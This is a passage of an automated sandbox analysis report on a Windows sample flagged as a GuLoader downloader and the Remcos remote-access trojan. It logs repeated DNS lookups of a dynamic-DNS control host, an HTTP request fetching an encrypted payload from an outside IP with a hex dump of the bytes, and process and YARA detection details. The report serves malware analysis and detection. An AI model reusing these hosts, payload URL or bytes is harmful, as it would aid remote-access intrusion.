                  Aug 3, 2021 19:06:03.364897013 CEST8.8.8.8192.168.2.30xc0e9No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:05.585144997 CEST8.8.8.8192.168.2.30xc40dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:07.775700092 CEST8.8.8.8192.168.2.30x3c4cNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:09.969455957 CEST8.8.8.8192.168.2.30xba84No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:12.181878090 CEST8.8.8.8192.168.2.30x71aaNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:15.233902931 CEST8.8.8.8192.168.2.30x1519No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:17.436507940 CEST8.8.8.8192.168.2.30x4316No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:19.619803905 CEST8.8.8.8192.168.2.30xd753No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:21.808489084 CEST8.8.8.8192.168.2.30x1990No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:23.992546082 CEST8.8.8.8192.168.2.30x3edeNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:26.202452898 CEST8.8.8.8192.168.2.30xe3a2No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:28.401519060 CEST8.8.8.8192.168.2.30x667No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:30.626837969 CEST8.8.8.8192.168.2.30xcc52No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:32.831609011 CEST8.8.8.8192.168.2.30xd900No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:35.025839090 CEST8.8.8.8192.168.2.30xe662No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:37.231322050 CEST8.8.8.8192.168.2.30x75aNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:39.421473026 CEST8.8.8.8192.168.2.30xbb11No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:41.665680885 CEST8.8.8.8192.168.2.30x1152No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:43.874284983 CEST8.8.8.8192.168.2.30x997cNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:46.092864037 CEST8.8.8.8192.168.2.30x8a48No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:48.294316053 CEST8.8.8.8192.168.2.30xc1c6No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:50.514136076 CEST8.8.8.8192.168.2.30x75e3No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:52.690589905 CEST8.8.8.8192.168.2.30xf2dfNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:54.903347015 CEST8.8.8.8192.168.2.30x7414No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:57.096909046 CEST8.8.8.8192.168.2.30x5c6fNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:59.308945894 CEST8.8.8.8192.168.2.30x25b1No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:01.572048903 CEST8.8.8.8192.168.2.30xa7a9No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:03.779144049 CEST8.8.8.8192.168.2.30x7bc4No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:05.974879980 CEST8.8.8.8192.168.2.30xbda9No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:08.178571939 CEST8.8.8.8192.168.2.30x106bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:10.413378954 CEST8.8.8.8192.168.2.30x458dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:12.616333008 CEST8.8.8.8192.168.2.30x33bcNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:14.823110104 CEST8.8.8.8192.168.2.30x57deNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:17.267951012 CEST8.8.8.8192.168.2.30x2f60No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:19.534274101 CEST8.8.8.8192.168.2.30x4f1aNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:21.735933065 CEST8.8.8.8192.168.2.30xba29No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:23.916037083 CEST8.8.8.8192.168.2.30x412dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:26.126003981 CEST8.8.8.8192.168.2.30xee6fNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:28.345453024 CEST8.8.8.8192.168.2.30x2238No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:30.567393064 CEST8.8.8.8192.168.2.30x26fdNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:32.802838087 CEST8.8.8.8192.168.2.30x7e26No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:35.040189981 CEST8.8.8.8192.168.2.30xeb55No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:37.239572048 CEST8.8.8.8192.168.2.30xa36No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:39.415898085 CEST8.8.8.8192.168.2.30x1bcfNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:41.625711918 CEST8.8.8.8192.168.2.30x30fbNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:43.823787928 CEST8.8.8.8192.168.2.30xd400No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:46.009243011 CEST8.8.8.8192.168.2.30xf1d3No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:48.245440960 CEST8.8.8.8192.168.2.30xeebbNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:50.439282894 CEST8.8.8.8192.168.2.30x55ebNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:52.736202002 CEST8.8.8.8192.168.2.30x9b87No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:54.935384989 CEST8.8.8.8192.168.2.30x8ceaNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:57.142123938 CEST8.8.8.8192.168.2.30xbf11No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:59.324852943 CEST8.8.8.8192.168.2.30x1642No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:08:01.529334068 CEST8.8.8.8192.168.2.30x6602No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:08:03.731192112 CEST8.8.8.8192.168.2.30x2043No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • 101.99.94.119

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.349736101.99.94.11980C:\Users\user\Desktop\pRcHGlVekw.exe
                  TimestampkBytes transferredDirectionData
                  Aug 3, 2021 19:01:31.451909065 CEST6019OUTGET /WEALTH_fkWglQyCXO188.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: 101.99.94.119
                  Cache-Control: no-cache
                  Aug 3, 2021 19:01:31.500464916 CEST6020INHTTP/1.1 200 OK
                  Date: Tue, 03 Aug 2021 17:01:31 GMT
                  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
                  Last-Modified: Mon, 02 Aug 2021 21:02:57 GMT
                  ETag: "72840-5c899e4c3da73"
                  Accept-Ranges: bytes
                  Content-Length: 469056
                  Content-Type: application/octet-stream
                  Data Raw: 31 79 a2 69 b5 67 ac a3 66 68 89 94 04 1b b4 8f c9 36 a1 00 58 5a db 92 66 6d cc 77 0a bf 4e 76 be cb df 4e 9d df 64 5e 44 ed 21 f3 cf f9 7d 62 b4 1b 44 fc 1e d1 54 51 7a 33 c1 4c df e6 15 ab fc 9f 41 d1 41 8f 51 31 14 c8 d8 11 ba 23 86 c1 35 93 9d fc 44 9e 32 ca a0 fd 73 d9 cb f8 37 88 87 1a 45 0a f7 90 fa bf 49 a3 1e a6 e2 63 d3 da f7 1b 8c 3f 3b 56 fb 73 f5 5f 71 11 21 67 d6 a5 5b 6f 63 6f 44 5d 92 7d a4 66 fa 44 00 3d 71 d6 5c 03 88 d7 97 a0 3d f6 3d 55 3c 74 0e f3 18 b3 74 b0 8f 9b fc 7f 70 16 c6 64 54 6e 65 de 18 f0 d3 5c bc 13 45 22 ac 24 20 7e 82 b9 70 76 a4 7d 01 f7 d5 61 be 6f 06 f4 2c 87 a6 b3 20 b2 ad 40 2e d1 2f 53 60 03 72 48 d8 a8 33 13 0a f2 ff d2 dd 78 63 a0 8b 27 17 28 0e 60 82 f6 72 ae 94 e0 7b d9 7f 8e c3 dd 64 b8 7a 3f 9c de 07 ce e8 0f a5 e2 f6 89 60 01 25 fd 8a 32 fc 79 07 a7 ab df eb 97 4a 2c 9a 34 91 22 ae 83 f5 10 09 71 2b 83 86 cf 6e c1 fd 78 9b ff 23 b1 96 1b 1e b1 63 5b 3d 90 ef 89 7e 8a 22 4d e5 54 77 c8 44 5a ca a4 4c 7d b5 c0 fc c0 dd 2e 18 32 28 dd ca 3a 96 9c 05 f0 1c 01 92 09 ad 55 8b 34 03 76 7c 2a c7 57 01 af c3 92 f4 fe a1 46 ae cb 12 c4 67 bb f2 9c 4b c8 90 cb 0b 36 3d a2 cf d6 65 cd 91 6d 1a 7b b3 ae 5d b5 71 0a 24 46 d2 95 ab 70 f8 9c 0c 0f 55 c2 c0 0c ed 95 d2 b5 e3 48 48 bc f0 3e 3a 82 e8 91 28 22 11 91 fd 50 31 d0 48 57 96 73 6f 6f ab 25 0c 11 ac 70 08 53 83 83 3f b8 3e c5 49 ba 0a e0 6c cd 20 3a db 77 67 8e fb 36 1e cb 1f 01 03 9a 71 8e 49 ed 61 2c 69 21 ad ce f9 ee ff ec 84 8e 6d 86 db b8 3f b7 03 e2 7f 24 ba 8c 67 c8 40 b0 eb df 8a b4 91 9b 4f 28 1a 3b 00 71 28 06 b7 a3 84 fa b2 23 5c 4c 76 b9 6d c0 ea b6 ba 5f 07 9a 82 96 5b b9 53 9d 33 fd 1b e9 51 5d 11 32 aa ab 37 a4 e9 e4 ed 8f 5f a9 dd 16 e8 f1 02 6d 5d 93 67 0b b1 97 41 ba 80 65 d4 cc ba 7e b1 6e be 4b 0a b7 2c 68 50 ad 15 84 32 c1 47 3e 78 a2 f0 ac 5e f6 53 15 d2 d0 93 e0 68 65 1c ab 21 69 d6 3b e3 69 9c 2b 10 57 7b 25 d8 99 a9 23 1e 80 6a 8b d0 4c c9 98 5f 04 ad 20 6e 20 e0 d4 86 3d d5 78 c0 63 00 93 0d 76 4f fd ab d5 50 53 0c fd ae b8 f8 84 03 9c dc 98 09 3d 1f 8f 80 de 9c d3 a6 97 0b fa 1a 66 11 63 4d 31 1f 06 d7 7e 4c ea b2 0d 17 00 0e 9f e1 20 97 00 06 32 b2 d4 a3 8a ef 7a 40 7f dd 0c 11 b7 be c1 20 e1 bb 88 08 d8 e9 42 02 00 36 78 93 28 da 41 52 f9 96 9e c3 54 a2 68 b6 e1 93 f8 b8 d3 15 6d 42 73 42 64 ce 30 64 40 c6 a3 ef ed a2 d8 77 ce b3 d0 4e 87 51 cd 57 42 a7 9e 1f fa 7c 71 00 a0 0e f5 10 6a ff 84 ee f7 d2 d0 7f 20 ec 19 ab 75 73 9c 02 41 31 3d 88 d3 19 ed 16 29 30 07 c6 5c c1 5b bd a4 4b 02 bc c6 24 24 f2 cb 2e 0a a2 1f a2 53 16 ba b6 66 85 70 87 87 55 7d 12 44 66 c1 b9 46 4e 1e a0 dc 7a e0 ca 8e 6e f8 1e 4b 3f 65 f2 b4 35 8e 12 2c b3 7e 16 04 83 d2 5c fc e9 9c 64 d2 98 66 e9 42 4b 0b ac c1 11 2d 8f b1 c5 d1 d1 42 8f 51 31 10 c8 d8 11 45 dc 86 c1 8d 93 9d fc 44 9e 32 ca e0 fd 73 d9 cb f8 37 88 87 1a 45 0a f7 90 fa bf 49 a3 1e a6 e2 63 d3 da f7 1b 8c 3f 3b 56 fb 73 f5 5f 71 11 31 66 d6 a5 55 70 d9 61 44 e9 9b b0 85 de fb 08 cd 1c 25 be 35 70 a8 a7 e5 cf 5a 84 5c 38 1c 17 6f 9d 76 dc 00 90 ed fe dc 0d 05 78 e6 0d 3a 4e 21 91 4b d0 be 33 d8 76 6b 2f a1 2e 04 7e 82 b9 70 76 a4 7d ab 74 97 51 50 8d 2a 97 c2 65 8a
                  Data Ascii: 1yigfh6XZfmwNvNd^D!}bDTQz3LAAQ1#5D2s7EIc?;Vs_q!g[ocoD]}fD=q\==U<ttpdTne\E"$ ~pv}ao, @./S`rH3xc'(`r{dz?`%2yJ,4"q+nx#c[=~"MTwDZL}.2(:U4v|*WFgK6=em{]q$FpUHH>:("P1HWsoo%pS?>Il :wg6qIa,i!m?$g@O(;q(#\Lvm_[S3Q]27_m]gAe~nK,hP2G>x^She!i;i+W{%#jL_ n =xcvOPS=fcM1~L 2z@ B6x(ARThmBsBd0d@wNQWB|qj usA1=)0\[K$$.SfpU}DfFNznK?e5,~\dfBK-BQ1ED2s7EIc?;Vs_q1fUpaD%5pZ\8ovx:N!K3vk/.~pv}tQP*e


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:18:59:30
                  Start date:03/08/2021
                  Path:C:\Users\user\Desktop\pRcHGlVekw.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\pRcHGlVekw.exe'
                  Imagebase:0x400000
                  File size:114688 bytes
                  MD5 hash:D2CB32F7C7F384B4BAA8DD13D6B5BBAB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  General

                  Start time:19:00:28
                  Start date:03/08/2021
                  Path:C:\Users\user\Desktop\pRcHGlVekw.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\pRcHGlVekw.exe'
                  Imagebase:0x400000
                  File size:114688 bytes
                  MD5 hash:D2CB32F7C7F384B4BAA8DD13D6B5BBAB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, Author: Joe Security
                  Reputation:low

                  Disassembly

                  Code Analysis

                  Reset < >